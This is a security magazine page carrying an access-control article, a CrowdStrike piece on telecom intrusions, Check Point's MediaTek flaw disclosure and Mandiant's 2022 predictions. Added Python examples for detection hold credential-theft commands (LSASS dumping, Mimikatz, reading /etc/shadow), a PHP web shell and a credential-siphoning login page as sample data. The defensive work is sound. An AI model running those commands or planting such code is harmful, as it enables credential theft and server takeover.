
Expert Speak

How Access Control Plays a Vital Role in a Safe and Secure Return-to-Work Strategy



Written by Sanjit Bardhan, Vice President – Head of Emerging Markets, Physical Access Control Solutions at HID Global

Employers today face a new challenge: to provide a safe and clean work environment as employees bring with them a new social consciousness centered on public health awareness, social distancing, and hygienic spaces. As employees consider a return to the physical workplace, employers must adapt to new requirements, implement new procedures, and leverage technology to alleviate their employees’ concerns.

Access control plays a critical role in creating a safe back-to-work strategy. Organizations can leverage contactless physical access technologies — including mobile credentials along with Bluetooth solutions — as well as implement location services and visitor management tools to provide employees with an experience that supports a healthy and safe work environment.

As organizations move toward reopening their offices, workers bring with them a new awareness of issues around human proximity, environmental and surface cleanliness, and the sharing of publicly accessed resources such as touch screens and keypads. Hygiene isn’t a new concern, but the level of awareness is new, as well as the need to give employees the confidence that their workplace is not only secure but healthy and safe. Physical access is a prime area of interest.

Crowded entryways, elevators and shared working spaces are a threat to safe social distancing. Credentialing processes that come with high human-to-human contact are also a cause for concern. Those who manage physical access can play a key role in helping to meet these changed expectations.

With health and safety concerns at the forefront, security and facilities personnel have the opportunity to be the heroes of the day. At a time when employee safety is not just an ordinary need, but an extraordinary moral obligation, teams can rise to the fore with proactive solutions that meaningfully impact the quality of life.

Access control management can help route employees, in tandem with efforts to stagger work times. Physical access control systems (PACS) can also leverage location services to support contact tracing and reduce crowding, and these same systems can be used in support of thoughtful visitor management.

While contactless credentials inherently support a touchless “badging in” experience, employers and building managers should implement these technologies as part of a holistic approach to building management. Clear policies, explicit signage, cleanliness protocols — all are part of this big picture.

Those looking to support a safe return to the workplace can look to technology to help minimize the high-touch human interactions that have characterized PACS in the past. By upgrading from legacy systems to more modernized solutions, it is possible to significantly reduce human contact around access control in a way that directly addresses employee concerns.

Various forms of touchless access control can help to reduce viral spread at human-to-object touchpoints. By reducing contact between humans and the objects related to access control, security could help to minimize potential cross-contamination. Automatic door operators, revolving doors, and sliding doors — all can help to reduce contact at high-volume entry and exit points. These can be coupled with contactless credentials and readers to ensure security while minimizing surface contamination.

Another strategy involves the use of long-range capable readers that leverage Bluetooth Low Energy (BLE) connections to deliver read performance at a distance. With a read range of up to several meters, BLE can further distance employees who might otherwise crowd up around readers and doors. Mobile access likewise reduces the need for employees to physically touch cards and communal readers.

Organizations that rely on keypads or two-factor authentication may find mobile credentials and mobile-capable readers a more hygienic alternative. The user must unlock their phone with a passcode, fingerprint, or face before the credential can be presented, which delivers two factors (possession of the phone plus a PIN or biometric) without anyone touching a shared keypad. This holds only if the credential is configured to require an unlocked device; a credential that can be read from a locked phone is a single factor.

In the same way, mobile also allows a biometric layer to be added to the access experience. Businesses can configure the mobile credential to work only when the device is unlocked, thereby requiring the owner to authenticate with their enrolled biometric, whether fingerprint or facial recognition. That mitigates the risk of a lost, stolen, or shared mobile device being used.

And by leveraging the technology on the mobile device instead of at the door, users are only touching their own device and not a touchpoint that is shared with every other occupant. Touchless credentials, including mobile-based, shouldn’t be limited to opening doors. Organizations also may find that these credentials support more hygienic protocols for logging in to networks, paying for vending, or activating printing. In order to reduce contact at shared surfaces, these technologies need to be implemented in tandem with clear policies and supporting signage.

Most credentialing processes rely on a high degree of human-to-human interaction: someone in IT or the card office prepares the card, the card may then be passed to HR or the front desk for delivery to the user. And when a card is lost or stolen, the process repeats. Whether it is an employee or a visitor, the credentialing process is typically a high-touch operation.

Over-the-air provisioning minimizes contact for those seeking credentials, and it can have a dramatic impact on the human-to-human contact for the administrator charged with assigning credentials. Fewer visits from those looking to obtain credentials significantly reduce the risk factor for those that normally see a range of personnel on a daily basis.

Visitors introduce a new variable to the equation. They must be credentialed upon entry, and their untracked movements can pose a health risk, or at least introduce a dangerous unknown should contact tracing become necessary. Solid policies and advanced technologies can ensure the safe movement of visitors. Visitor management solutions can be used either standalone or in conjunction with an organization’s access control system. Visitors self-register in the lobby and hosts are notified when they arrive.

Driver’s license scanners, barcode scanners, cameras, and printers all help support those front desk processes. While the primary use case is for visitors, these systems can also be used to issue employees temporary badges for single-day use or to issue replacement badges.

Visitor management solutions are also ideal for a range of high-volume settings, including healthcare, schools, and logistics — all places where physical access control is critical and visitors are frequent. Even more, records from the visitor management system can be used for follow-up tracking of potential contacts in case an employee or visitor receives a positive virus test result.

The key to keeping people physically distanced is knowing where they are at any given time. Much as GPS is used in outdoor settings, location services use BLE beacons that ping off gateways, which in turn identify the location of individuals in a physical space. An individual’s identity can be tied to an ID card that broadcasts continually, creating a virtual map of location relative to the fixed gateways.

Location services give management a means to be proactive rather than reactive in their efforts to promote physical distancing. The same system could make space utilization more efficient. Connected beacons could broadcast room occupancy, for example, letting people know which spaces are free and which are in use. In the same way, this connectivity could serve as an early-warning system.

There’s also significant forensic value in this capability. Should an individual test positive for COVID, the arduous task of contact tracing — identifying people who have an infectious disease and those they’ve come in contact with — is automated. “Rather than relying on a person’s memory, you can trace a person — or anything tagged with a beacon – and build historical data on where that person had been and who else had been there, with graphics and analysis,” said Blokker.

In addition, location services support “mustering” — the ability to call together a select group of employees in an urgent circumstance. Location services can also support monitoring usage of hand sanitizing stations. By embedding a BLE sensor in the soap or sanitizer dispenser, the user’s beacon authenticates and registers the event. With hand hygiene being a key way to prevent the spread of infection, enforcing consistent usage is vital to a healthy workplace.

For those charged with implementing and overseeing physical access control, these are extraordinarily challenging times. While technology can play a significant role in supporting social distancing and other pandemic-related needs, policies are at the core of any successful return-to-work effort.

It is critical, for example, to have solid audit systems in place. A PACS generates logs, reports, and archives, invaluable information if put to good use. Building managers can use this data to see who was in the facility and when, in order to build a fuller picture of the operational risks.
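As an added illustration of how the audit and location data described above can answer the contact-tracing question (this is example code, not HID Global's product or anything from the original article), the following Python script takes a constructed export of timestamped badge or beacon events, turns them into presence intervals for each person, and lists everyone who shared a zone with an index case for at least a minimum overlap. The event format, the one-hour maximum dwell time and the five-minute overlap threshold are assumptions made for the example, not parameters of any real PACS.

```python
"""Co-presence query over physical access / location events.

Added example; it is not HID Global's code. It assumes an export of
timestamped (person, zone) records such as a PACS door log or a BLE
location service would produce, with no explicit exit events. The sample
records below are constructed.
"""
from datetime import datetime, timedelta

# Constructed export: ISO timestamp, badge holder, zone the event placed them in.
SAMPLE_EVENTS = """\
2021-11-02T08:55:10,alice,lobby
2021-11-02T08:57:40,alice,floor3-east
2021-11-02T09:01:05,bob,lobby
2021-11-02T09:03:30,bob,floor3-east
2021-11-02T09:45:00,carol,floor3-east
2021-11-02T10:10:00,bob,floor2-cafe
2021-11-02T12:30:00,dave,lobby
"""


def parse_events(text):
    """Parse CSV lines into (timestamp, person, zone), sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, person, zone = (field.strip() for field in line.split(","))
        events.append((datetime.fromisoformat(ts), person, zone))
    events.sort()
    return events


def presence_intervals(events, max_dwell=timedelta(hours=1)):
    """Turn point events into presence intervals (person, zone, start, end).

    Assumption: a person stays in a zone from one event until their next
    event, capped at max_dwell because badge logs rarely record exits."""
    by_person = {}
    for ts, person, zone in events:
        by_person.setdefault(person, []).append((ts, zone))
    intervals = []
    for person, evs in by_person.items():
        for i, (start, zone) in enumerate(evs):
            end = evs[i + 1][0] if i + 1 < len(evs) else start + max_dwell
            intervals.append((person, zone, start, min(end, start + max_dwell)))
    return intervals


def find_contacts(intervals, index_person, min_overlap=timedelta(minutes=5)):
    """Return {person: [(zone, overlap_start, overlap_duration), ...]} for
    everyone who shared a zone with index_person for at least min_overlap."""
    index = [(z, s, e) for p, z, s, e in intervals if p == index_person]
    contacts = {}
    for person, zone, start, end in intervals:
        if person == index_person:
            continue
        for izone, istart, iend in index:
            if zone != izone:
                continue
            overlap = min(end, iend) - max(start, istart)
            if overlap >= min_overlap:
                contacts.setdefault(person, []).append(
                    (zone, max(start, istart), overlap))
    return contacts


def trace(text, index_person, min_overlap_minutes=5):
    """Convenience wrapper: raw export text -> contact dictionary."""
    intervals = presence_intervals(parse_events(text))
    return find_contacts(intervals, index_person,
                         timedelta(minutes=min_overlap_minutes))


if __name__ == "__main__":
    for person, hits in sorted(trace(SAMPLE_EVENTS, "alice").items()):
        for zone, when, dur in hits:
            print(f"{person}: {zone} from {when:%H:%M}, {dur} overlap with alice")
```

Run against a real export, the same two knobs matter most: without exit events, max_dwell decides how long someone is presumed to remain in a zone, and min_overlap decides how brief a co-presence still counts. The output is personal data and belongs under the same access controls and retention limits as the PACS log it was derived from.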

Cyber Security

Telecom Sector: Cyber Attack Target Number One for Nation-State Actors



Written by Roland Daccache, Systems Engineer Manager MEA, CrowdStrike

Telecommunications providers play a unique and crucial role in modern societies. Businesses, governments, and individuals rely on the smooth functioning of communications. However, it is precisely this centrality and ubiquitous presence of telecommunications systems that also make them valuable targets for governments and criminals worldwide.

Targeting the telecommunications sector is becoming more and more popular
The latest OverWatch Report from CrowdStrike shows that attacks on the telecommunications industry have more than doubled in the last 12 months. Overall, 40 percent of all targeted attack attempts detected by OverWatch experts were directed at this industry. The sector is especially attractive to nation-state actors, because targeted attacks there serve their own surveillance, intelligence, and counterintelligence missions. It comes as no surprise that telecommunications tops the list of the five industries most targeted by nation-state actors.

Most attacks on telecom companies come from groups close to China, but actors with an Iranian background have also been seen attacking the sector. The operations against telecommunication providers show that protecting sensitive data and critical infrastructure is becoming ever more important, and they are one more reason to keep a close eye on the constantly changing threat landscape and its actors in order to find effective countermeasures to their tactics, techniques, and procedures (TTPs).

Attacks on the telecommunications industry – The typical TTPs
To gain initial access to victim networks, attackers targeting the communications sector use a variety of techniques. Among the most common are spear phishing, exploitation of vulnerabilities, supply-chain compromise, and misuse of legitimate credentials.

Once initial access is gained, the attackers use native tools such as Windows Management Instrumentation (WMI) and command and script interpreters such as PowerShell to carry out their mission. To avoid detection and proceed without interference, they keep looking for new hosts from which credentials can be collected, so that they can continue moving laterally through the target environment unnoticed.

To harvest credentials in Microsoft environments, attackers often use Mimikatz, read LSASS process memory (often via the MiniDump export of comsvcs.dll or with ProcDump), or modify the WDigest registry key (UseLogonCredential) so that LSASS keeps plaintext passwords in memory.

In Linux environments, attackers often inspect sensitive files such as .bash_history, /etc/passwd, /etc/shadow, and other configuration files and administrative scripts when trying to discover credentials. OverWatch has also observed newer techniques. In one case, an attacker used a backdoor to deploy a modified SSH daemon capable of logging credentials.
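The two paragraphs above list the credential-access techniques OverWatch sees most often on Windows and Linux hosts. The Python script below is an added example, not CrowdStrike's code, of how a detection engineer would express those techniques as rules over endpoint telemetry. It assumes events already normalised into the small dictionary shape shown and uses constructed sample events: the comsvcs.dll MiniDump and ProcDump dumps of LSASS, a Mimikatz command line, the WDigest UseLogonCredential change, a non-allow-listed process reading LSASS memory, interactive reads of /etc/shadow and .bash_history, and an sshd binary rewritten by something other than the package manager. The Defender allow-list entry and the field names are assumptions made for the example.

```python
"""Credential-access detection over constructed endpoint events.

Added example; it is not CrowdStrike's or OverWatch's logic. It assumes
endpoint telemetry already normalised into the dictionaries below
(Sysmon-style process creation, registry set and process access records on
Windows; process and file-write records from auditd on Linux). Every sample
event is constructed for this example; the Defender allow-list entry is a
site-specific assumption.
"""
import re

# Windows: command lines that dump or parse LSASS (rule name, pattern).
WINDOWS_CMDLINE_RULES = [
    ("lsass_dump_comsvcs", re.compile(r"comsvcs\.dll.*minidump", re.I)),
    ("lsass_dump_procdump", re.compile(r"procdump(64)?(\.exe)?.*lsass", re.I)),
    ("mimikatz_cmdline", re.compile(r"sekurlsa::|privilege::debug|lsadump::", re.I)),
]
# Sysmon EID 10 GrantedAccess bits needed to read another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFO = 0x0400 | 0x1000   # QUERY_INFORMATION | QUERY_LIMITED_INFORMATION
LSASS_READERS_ALLOWED = {"C:\\Program Files\\Windows Defender\\MsMpEng.exe"}  # assumption

# Linux: interactive reads of files that hold or reveal credentials.
LINUX_CRED_FILES = ("/etc/shadow", "/etc/passwd", ".bash_history", "/etc/sudoers", ".ssh/id_")
LINUX_READERS = re.compile(r"^(cat|less|more|head|tail|grep|cp|scp|base64|xxd|strings)\b")
PACKAGE_MANAGERS = {"/usr/bin/dpkg", "/usr/bin/rpm", "/usr/bin/apt-get"}


def check_windows(ev):
    hits = []
    if ev["event"] == "process_create":
        hits += [name for name, rx in WINDOWS_CMDLINE_RULES if rx.search(ev.get("cmdline", ""))]
    elif ev["event"] == "registry_set":
        # UseLogonCredential=1 makes LSASS keep plaintext passwords in memory.
        if (ev.get("target", "").lower().endswith("\\wdigest\\uselogoncredential")
                and ev.get("details", "").lower().endswith("(0x00000001)")):
            hits.append("wdigest_plaintext_enabled")
    elif ev["event"] == "process_access":
        access = int(ev.get("granted_access", "0x0"), 16)
        if (ev.get("target_image", "").lower().endswith("\\lsass.exe")
                and access & PROCESS_VM_READ and access & PROCESS_QUERY_INFO
                and ev.get("source_image") not in LSASS_READERS_ALLOWED):
            hits.append("lsass_memory_read")
    return hits


def check_linux(ev):
    hits = []
    if ev["event"] == "process_create":
        cmd = ev.get("cmdline", "")
        if LINUX_READERS.match(cmd) and any(f in cmd for f in LINUX_CRED_FILES):
            hits.append("sensitive_file_read")
    elif ev["event"] == "file_write":
        # A replaced sshd is how a credential-logging daemon gets installed.
        if ev.get("target") in ("/usr/sbin/sshd", "/usr/bin/ssh") \
                and ev.get("image") not in PACKAGE_MANAGERS:
            hits.append("ssh_binary_modified")
    return hits


def detect(events):
    """Run the per-OS checks and return (rule, host, evidence) tuples."""
    findings = []
    for ev in events:
        checker = check_windows if ev["os"] == "windows" else check_linux
        evidence = ev.get("cmdline") or ev.get("target") or ev.get("source_image")
        findings += [(rule, ev["host"], evidence) for rule in checker(ev)]
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, one benign line per OS for contrast
    {"os": "windows", "host": "WS01", "event": "process_create",
     "cmdline": "notepad.exe report.txt"},
    {"os": "windows", "host": "WS01", "event": "process_create",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 652 C:\\temp\\l.dmp full"},
    {"os": "windows", "host": "WS02", "event": "process_create",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe out.dmp"},
    {"os": "windows", "host": "WS02", "event": "registry_set",
     "target": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential",
     "details": "DWORD (0x00000001)"},
    {"os": "windows", "host": "WS03", "event": "process_access",
     "source_image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1410"},
    {"os": "windows", "host": "WS03", "event": "process_access",
     "source_image": "C:\\Users\\Public\\svc.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    {"os": "windows", "host": "WS04", "event": "process_create",
     "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"os": "linux", "host": "gw01", "event": "process_create", "cmdline": "cat /etc/shadow"},
    {"os": "linux", "host": "gw01", "event": "process_create",
     "cmdline": "grep -i passw /home/ops/.bash_history"},
    {"os": "linux", "host": "gw01", "event": "process_create", "cmdline": "ls -la /etc"},
    {"os": "linux", "host": "gw02", "event": "file_write",
     "image": "/tmp/.x/install", "target": "/usr/sbin/sshd"},
]

if __name__ == "__main__":
    for rule, host, evidence in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {evidence}")
```

The LSASS rule keys on the Sysmon EID 10 access mask rather than on a tool name, which is what catches renamed or custom dumpers; the price is the allow-list of legitimate readers, which has to be maintained per site.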

Attackers also make use of web-based login pages, modifying them so that submitted login information is stored for later retrieval. Credentials then accumulate on their own, so the attackers are no longer under time pressure after their initial access. So-called web shells also make it possible to manage multiple victim networks via a single interface, which creates the very real danger of one group running attacks against several victims simultaneously.

The effort required to run operations is thus considerably reduced for the attackers. Web shells are also attractive because they are simple and work across platforms and web server environments. With all these tools, actors learn when, how, and where call detail records and SMS messages are forwarded and stored, and can then go after exactly that data.
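Modified login pages and dropped web shells, as described above, are both changes to files on the web server, so the practical check is file integrity plus a scan for shell idioms. The Python script below is an added example, not CrowdStrike's tooling: it builds a hash baseline from a constructed known-good PHP deployment, then audits a constructed post-intrusion tree in which the login page has been altered to append submitted credentials to a hidden file, a one-line web shell has appeared in the upload directory, and a page has gone missing. The file contents, paths and indicator patterns are assumptions made for the example.

```python
"""Web-root tamper check: hash baseline plus web-shell indicators.

Added example; it is not CrowdStrike's tooling. It assumes a hash baseline
of the deployed web application kept off the web server, and that scripts
are PHP (the indicator patterns below are PHP-flavoured). The 'files' are
constructed strings standing in for on-disk content.
"""
import hashlib
import re

SCRIPT_EXT = (".php", ".phtml", ".phar", ".inc")

# Indicator name -> pattern. Each is a common web-shell / credential-siphon idiom.
SHELL_INDICATORS = [
    ("encoded_eval", re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    ("request_to_shell", re.compile(r"\b(passthru|shell_exec|system|exec|proc_open|popen)\s*\(\s*\$_(GET|POST|REQUEST)", re.I)),
    ("request_as_function", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\(", re.I)),
    ("credential_siphon", re.compile(r"(file_put_contents|fwrite|fputs|mail|curl_setopt)\s*\([^;]*\$_(POST|REQUEST)\[['\"]?(pass|pwd|password)", re.I)),
]


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def build_baseline(files):
    """files: {path: bytes} from a known-good deployment -> {path: sha256}."""
    return {path: sha256(content) for path, content in files.items()}


def scan_indicators(content):
    text = content.decode("utf-8", errors="replace")
    return [name for name, rx in SHELL_INDICATORS if rx.search(text)]


def audit(baseline, current):
    """Compare the live tree against the baseline.

    Returns (status, path, indicators) for every file that is new, modified or
    missing; unchanged files are not reported. Indicators are only computed
    for script files, since that is where a shell or a siphon would live."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            findings.append(("missing", path, []))
            continue
        if path not in baseline:
            status = "new"
        elif baseline[path] != sha256(current[path]):
            status = "modified"
        else:
            continue
        indicators = scan_indicators(current[path]) if path.lower().endswith(SCRIPT_EXT) else []
        findings.append((status, path, indicators))
    return findings


# Constructed known-good deployment.
CLEAN_FILES = {
    "index.php": b"<?php require 'lib/app.php'; render_home(); ?>",
    "login.php": (b"<?php\nsession_start();\n"
                  b"if (check_password($_POST['user'], $_POST['password'])) {\n"
                  b"    header('Location: /home');\n}\n"),
    "about.php": b"<?php render_page('about'); ?>",
    "css/site.css": b"body { font-family: sans-serif; }",
}
BASELINE = build_baseline(CLEAN_FILES)

# Constructed live tree after an intrusion: the login page siphons credentials
# to a hidden file, a web shell sits in the upload directory, about.php is gone.
CURRENT_FILES = dict(CLEAN_FILES)
del CURRENT_FILES["about.php"]
CURRENT_FILES["login.php"] = (
    b"<?php\nsession_start();\n"
    b"file_put_contents('/var/tmp/.fontcache', $_POST['user'].':'.$_POST['password'].\"\\n\", FILE_APPEND);\n"
    b"if (check_password($_POST['user'], $_POST['password'])) {\n"
    b"    header('Location: /home');\n}\n")
CURRENT_FILES["uploads/img.php"] = b"<?php eval(base64_decode($_POST['c'])); ?>"

if __name__ == "__main__":
    for status, path, indicators in audit(BASELINE, CURRENT_FILES):
        print(f"{status:8} {path}  {' '.join(indicators)}")
```

On a real host the baseline must come from the deployment pipeline or an offline copy, never from the server being checked, and the indicator patterns are a triage hint rather than a verdict: a modified login handler with no indicator match still needs a human to diff it.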

Collateral damage from hacker attacks
To disguise their true goals and intentions, attackers often carry out very large-scale data exfiltration. In reality, however, they are often interested only in specific information about a very few people. The damage caused is nevertheless immense, which makes it all the more important to identify and stop the attackers. That is often harder than expected, because the intruders frequently have extensive knowledge of the target network and are therefore difficult to distinguish from legitimate administrators.

A comprehensive cyber defence that detects and successfully defends against these activities is therefore indispensable, especially for critical infrastructure. To counter the tactics and techniques of modern attackers, it is advisable to rely not only on the latest technologies but also on human know-how and active threat hunting. These specialists tirelessly search for novel and anomalous tactics, techniques and procedures (TTPs) that remain undetected by technical measures, and stop them as soon as they are identified.


Expert Speak

Security Flaws in Smartphone Chip Could Have Led Hackers to Eavesdrop on Android Users



Check Point Research (CPR) identified security flaws in the smartphone chip made by Taiwanese manufacturer MediaTek. Found in 37% of the world’s smartphones, MediaTek’s chip serves as the main processor for nearly every notable Android device, including Xiaomi, Oppo, Realme, Vivo, and more. The security flaws were found inside the chip’s audio processor. Left unpatched, the vulnerabilities could have enabled a hacker to eavesdrop on an Android user and/or hide malicious code.

MediaTek chips contain a special AI processing unit (APU) and an audio digital signal processor (DSP) to improve media performance and reduce CPU usage. Both the APU and the audio DSP have custom microprocessor architectures, making the MediaTek DSP a unique and challenging target for security research. CPR grew curious about the degree to which the MediaTek DSP could be used as an attack vector by threat actors. For the first time, CPR was able to reverse engineer the MediaTek audio processor, revealing several security flaws.

Attack Methodology
To exploit the security vulnerabilities, a threat actor’s order of operations, in theory, would be:

  • A user installs a malicious app from the Play Store and launches it
  • The app uses the MediaTek API to attack a library that has permissions to talk with the audio driver
  • The app with system privilege sends crafted messages to the audio driver to execute code in the firmware of the audio processor
  • The app steals the audio flow

Responsible Disclosure
CPR responsibly disclosed its findings to MediaTek, resulting in the following CVEs: CVE-2021-0661, CVE-2021-0662, CVE-2021-0663. These three vulnerabilities were subsequently fixed and published in the October 2021 MediaTek Security Bulletin. The security issue in the MediaTek audio HAL (CVE-2021-0673) was fixed in October and will be published in the December 2021 MediaTek Security Bulletin. CPR also informed Xiaomi of its findings.

Slava Makkaveev, Security Researcher at Check Point Software, said, “MediaTek is known to be the most popular chip for mobile devices. Given its ubiquity in the world, we began to suspect that it could be used as an attack vector by potential hackers. We embarked on research into the technology, which led to the discovery of a chain of vulnerabilities that potentially could be used to reach and attack the audio processor of the chip from an Android application. Left unpatched, a hacker potentially could have exploited the vulnerabilities to listen in on conversations of Android users. Furthermore, the security flaws could have been misused by the device manufacturers themselves to create a massive eavesdrop campaign. Although we do not see any specific evidence of such misuse, we moved quickly to disclose our findings to MediaTek and Xiaomi. In summary, we proved out a completely new attack vector that could have abused the Android API. Our message to the Android community is to update their devices to the latest security patch in order to be protected. MediaTek worked diligently with us to ensure these security issues were fixed in a timely manner, and we are grateful for their cooperation and spirit for a more secure world.”

Tiger Hsu, Product Security Officer at MediaTek said “Device security is a critical component and priority of all MediaTek platforms. Regarding the Audio DSP vulnerability disclosed by Check Point Software, we worked diligently to validate the issue and make appropriate mitigations available to all OEMs. We have no evidence it is currently being exploited. We encourage end-users to update their devices as patches become available and to only install applications from trusted locations such as the Google Play Store. We appreciate the collaboration with the Check Point research team to make the MediaTek product ecosystem more secure.”


Cyber Security

Mandiant Shares Cybersecurity Predictions for 2022



Mandiant has released its predictions report – 14 Cyber Security Predictions for 2022 and Beyond.
“The only constant in our industry is the uncertainty in the cyber realm. Attackers keep evolving – getting more sophisticated and changing their tactics, techniques and procedures to try to get one up on the defenders,” said Gordon Love, VP MEA at Mandiant. “This report provides security leaders with an overview of what to expect in 2022 and beyond, based on the trends we see now. Organisations have a lot to keep in mind for next year, but remaining vigilant will enable them to defend against upcoming threats—and respond to those that inevitably get through.”

The top cyber security threats identified in the report include:

No end in sight for Ransomware
The ransomware threat has grown significantly throughout the past decade, and it will continue its upward trend. The business of ransomware is simply too lucrative unless international governments and technology innovations can fundamentally alter the attacker cost-benefit calculation.

Threat actors engaged in multifaceted extortion will continue to find more ways to extort payments from their victims. In 2022 Mandiant expects to see actors ramp up new tactics, such as trying to recruit insiders within their victims or targets. More cybercriminals are expected to evolve as threat actors become more business savvy and learn what kind of situations their victims most want to avoid.

Focus on Operational Technology (OT)
Throughout 2021, Mandiant observed low sophistication threat actors learn that they could create big impacts in the OT space—perhaps even bigger than intended. Actors will continue to explore the OT space in 2022 and increasingly use ransomware in their attacks.

Attacks against critical OT environments can cause severe disruption and even threaten human lives, thereby increasing the pressure for organizations to pay a ransom. To compound the issue, many of these OT devices are not built with security at the forefront of the design, and there is a massive uptick in the number of vulnerabilities being identified in OT environments.

Iran to continue their aggressive stance
Iran will use its cyber tools in a much more aggressive manner to promote regional interests, and will continue to target Israel and others in the Middle East. It has shown its capability and willingness to use destructive malware, so it is expected to take advantage of any opportunity presented. Ultimately, Iran will try to shift the balance of power toward its own interests. Mandiant has seen Iranian actors targeting abroad, but their targeting will most likely remain regional throughout 2022.

Afghanistan events may trigger espionage
With the assertion of Taliban control and departure of U.S. forces from Afghanistan, one can expect further cyber espionage and information operations. The usual information operations actors—Iran, China, Russia—are expected to push narratives to support their interests through the end of 2021 and into 2022. They’ll also play up negative perceptions around the events, notably the perception that the U.S. failed to live up to its commitments to organizations and countries.

Cloud and third parties introduce new chokepoints
Organizations will continue to increasingly rely on the cloud and cloud-hosted third-party providers for primary business tasks, putting more pressure on those third parties to maintain both availability and security. The proportion of Mandiant incident response investigations involving cloud resources has grown over the past several years, and they anticipate that cloud compromise and abuse will continue to grow in tandem with enterprise cloud adoption throughout 2022.

More internet of things (IoT) devices, more vulnerabilities, more attack surface
As the number of IoT devices grows, so will the number of vulnerabilities for bug hunters to track. These devices are connected, and the general attack surface expands with the potential for profound impact. Unfortunately, there hasn’t been enough emphasis on security in fundamental IoT device design to fix these issues, so the situation will only get worse in the years to come.

As we move into 2022, CISOs have a lot on their mind and remaining vigilant will enable them to defend against upcoming threats—and respond to those that inevitably get through.




Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.